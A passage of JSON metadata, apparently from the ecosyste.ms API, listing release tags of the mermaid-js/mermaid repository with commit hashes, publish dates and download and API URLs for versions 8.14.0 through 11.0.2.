_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid